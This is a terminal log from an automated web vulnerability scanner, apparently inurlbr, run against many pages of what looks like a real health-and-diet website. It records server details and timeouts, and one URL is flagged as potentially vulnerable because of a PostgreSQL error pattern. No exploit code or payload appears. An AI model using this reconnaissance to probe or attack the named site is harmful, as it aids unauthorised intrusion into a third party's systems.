- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7837 out of 15353 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 27 / 63 [1;37m][0;37m-[23:35:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultlinks/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 19969 out of 93853 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 28 / 63 [1;37m][0;37m-[23:36:03][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/pharmalinks/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 53331 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 29 / 63 [1;37m][0;37m-[23:36:08][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/rebaka/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 30 / 63 [1;37m][0;37m-[23:36:13][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/thetencommandments/terms/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 31 / 63 [1;37m][0;37m-[23:36:20][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childlinks/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7837 out of 15340 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 32 / 63 [1;37m][0;37m-[23:36:25][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childcustomers/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 33 / 63 [1;37m][0;37m-[23:36:29][1;37m [ ! ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m [32m( POTENTIALLY VULNERABLE )[0m [1m [32mhttp://www.doctorarik.co.il/20170629102001-nyv-472.html[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m[32mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[32m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37m[32m POSTGRESQL-06 - VALUE: pg_[0m
- [1;37m|_[ + ][1;30m VALUE SAVED IN THE FILE::[0;37m inurlbr-doctorarik.co.il.txt[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 34 / 63 [1;37m][0;37m-[23:36:37][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adult-articles/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 15925 out of 20385 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 35 / 63 [1;37m][0;37m-[23:36:43][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adults-recipes/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 14577 out of 20851 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 36 / 63 [1;37m][0;37m-[23:36:52][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/the-right-diet/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 26817 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 37 / 63 [1;37m][0;37m-[23:36:58][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/mobile-links/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 38 / 63 [1;37m][0;37m-[23:37:04][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/breakfastimportant/510/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 39 / 63 [1;37m][0;37m-[23:37:09][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/sport-for-diet/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 40 / 63 [1;37m][0;37m-[23:37:15][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/healtheatright/588/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 41 / 63 [1;37m][0;37m-[23:37:19][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/justcloths/208/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 42 / 63 [1;37m][0;37m-[23:37:26][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/hardonwinter/214/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 43 / 63 [1;37m][0;37m-[23:37:29][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/wp-login.php?action=lostpassword[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 44 / 63 [1;37m][0;37m-[23:37:35][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/adult-article2/150/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 45 / 63 [1;37m][0;37m-[23:37:42][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-3/289/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 9185 out of 15884 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 46 / 63 [1;37m][0;37m-[23:37:49][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-10/334/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 15976 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 47 / 63 [1;37m][0;37m-[23:37:56][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-6/298/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 16015 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 48 / 63 [1;37m][0;37m-[23:38:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-2/218/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 49 / 63 [1;37m][0;37m-[23:38:07][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-8/330/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 50 / 63 [1;37m][0;37m-[23:38:14][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-7/328/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 15375 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 51 / 63 [1;37m][0;37m-[23:38:21][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/adult-article1/145/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 16848 bytes received[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 52 / 63 [1;37m][0;37m-[23:38:25][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-5/296/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 53 / 63 [1;37m][0;37m-[23:38:29][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-7/300/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 54 / 63 [1;37m][0;37m-[23:38:32][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-10/307/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 55 / 63 [1;37m][0;37m-[23:38:36][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-9/305/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 56 / 63 [1;37m][0;37m-[23:38:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-5/324/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 57 / 63 [1;37m][0;37m-[23:38:43][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-4/292/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 58 / 63 [1;37m][0;37m-[23:38:47][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-11/309/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 59 / 63 [1;37m][0;37m-[23:38:51][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-11/336/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
